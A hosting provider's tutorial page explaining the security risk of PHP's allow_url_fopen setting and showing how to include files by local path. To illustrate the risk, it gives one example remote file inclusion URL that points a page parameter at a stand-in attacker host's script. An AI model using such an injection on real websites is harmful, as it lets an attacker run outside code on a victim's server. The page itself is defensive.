• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar
  • Skip to footer

02 7903 0216

     

Open Ticket

    

Client Area

FASTDOT Web Hosting Australia

FASTDOT Web Hosting Australia

Australian Cloud Hosting

  • Web Design
    • eCommerce Development
    • Branding
    • Web Design
  • Domains
    • Register
    • Domain FAQ
    • Domain Extensions
    • MyDNS Manager
    • Domain Transfer
  • Hosting
    • WordPress Hosting
    • Sydney cPanel Hosting
    • Magento Hosting – eCommerce Website
    • eCommerce Options
      • Managed Magento Hosting
      • PrestaShop Hosting
      • OpenCart Hosting
      • CS-Cart Hosting
    • Business Emails
  • Cloud Servers
    • VMware ESXi Hypervisor
    • Equinix – ISO Certified Data Centres
    • Cloud Hosting Info
    • Virtual Machines
  • Resources
    • Partner Program
    • Transferring Websites
    • WordPress Tips
    • Email Tutorials
    • Hosting in Australia
    • Apps Galore
    • Tutorials & News
      • SEO
      • VMware VPS Cloud
      • PHP and MySQL
      • Security
      • Linux Guides
      • Server Management
Order Now

WordPress Hosting in Australia

Starting from AUD $9.95

Sign Up

March 5, 2007 by Editor

This tutorial will discuss the security issues with allow_url_fopen in PHP

The PHP option allow_url_fopen would normally allow a programmer to open, include or otherwise use a remote file using a URL rather than a local file path. For security reasons, FASTDOT has disabled this feature; however, a feature-rich alternative exists in the form of the bundled cURL library.

Server-Side Includes

Many developers include files by pointing to a remote URL, even if the file is within the local system. For example:

<?php include(“http://example.com/includes/example_include.php”); ?>

With allow_url_fopen disabled, this method will not work. Instead, the file must be included with a local path, and there are three methods of doing this:

  1. By using a relative path, such as ../includes/example_include.php.
  2. By using an absolute path (also known as relative-from-root), such as /home/username/example.com/includes/example_include.php.
  3. By using the PHP environment variable $_SERVER['DOCUMENT_ROOT'], which returns the absolute path to the web root directory. This is by far the best (and most portable) solution. The example that follows shows the environment variable in action:

Processing Differences (and passing variables to an included file)

It is worth mentioning that the alternative solutions presented here will result in a difference in the way the include() function is handled. The alternative solutions all return the PHP code from the included page; however, the now-unavailable remote URL method returns the result from the included page. One result of this behavior is that you cannot pass a querystring using the alternative solutions. You define the variables locally before performing the include:

Example

To achieve the effect of this:

<?php include("http://yourdomain.com/includes/example_include.php?var=example"); ?>

You must instead use this:

<?php $var = "example"; include($_SERVER['DOCUMENT_ROOT']."/includes/example_include.php"); ?>

Example exploitation

If allow_url_fopen is enabled, this system can be exploited by simply changing the value of the variable in the querystring:

http://yourdomain.com/index.php?page=http://crackerscum.net/evilscript.txt

To avoid potential compromise of our customer websites, the PHP variable allow_url_fopen=off is enabled on all servers

OpenCart Hosting

 

More great articles

Block countries using CSF Firewall
SSH commands for CSF - ConfigServer Security & Firewall
Solving a 500 Internal Server Error
How to reset the MySQL root password in CentOS via SSH

Category iconPHP and MySQL,  Security

Primary Sidebar

Recent Posts

  • How to Upload Files Using the cPanel File Manager?
  • How To Increase the PHP Max Upload Size in cPanel®?
  • Choosing a hosting platform in 2021
  • VARCHAR vs. TEXT for MySQL Databases
  • What Are the Best Shopify® Alternatives in 2021?
Features of PHP5
MySQL and phpMyAdmin
MySQL Database - How to Duplicate a MySQL Database in cPanel
What is a phpinfo file and how to create it

Categories

  • Application Hosting
  • Australian Cloud Hosting
  • cPanel Hosting
  • DNS and Domains
  • eCommerce Hosting
  • Email Tutorials
  • Legals
  • Linux Tutorials
  • Operating Systems
  • PHP and MySQL
  • Register a Domain Name
  • Search Engine Optimization
  • Security
  • Server Management
  • Tutorials
  • VMware Cloud Hosting
  • Web Hosting Tutorials
  • WordPress Tips & Tricks
Australian web hosting

Footer

Recent Posts

  • How to Upload Files Using the cPanel File Manager?
  • How To Increase the PHP Max Upload Size in cPanel®?
  • Choosing a hosting platform in 2021
  • VARCHAR vs. TEXT for MySQL Databases
  • What Are the Best Shopify® Alternatives in 2021?

Legals

  • Terms&Conditions
  • SLA
  • Acceptable Usage Policies
  • Privacy Policies
  • About FASTDOT
  • ISO Certified

Contact

Australia: +61 02 7903 0216
Submit a Support Ticket

Company

FASTDOT.COM.AU PTY/LTD
ACN 002 454 631
200 Bourke Rd, Alexandria NSW 2015 Australia
Processing by eWay, PayPal and Bitcoin

blankNSW Government Provider

Made with in Sydney/Australia

Copyright © 2022 FASTDOT.COM

All rights reserved. Return to top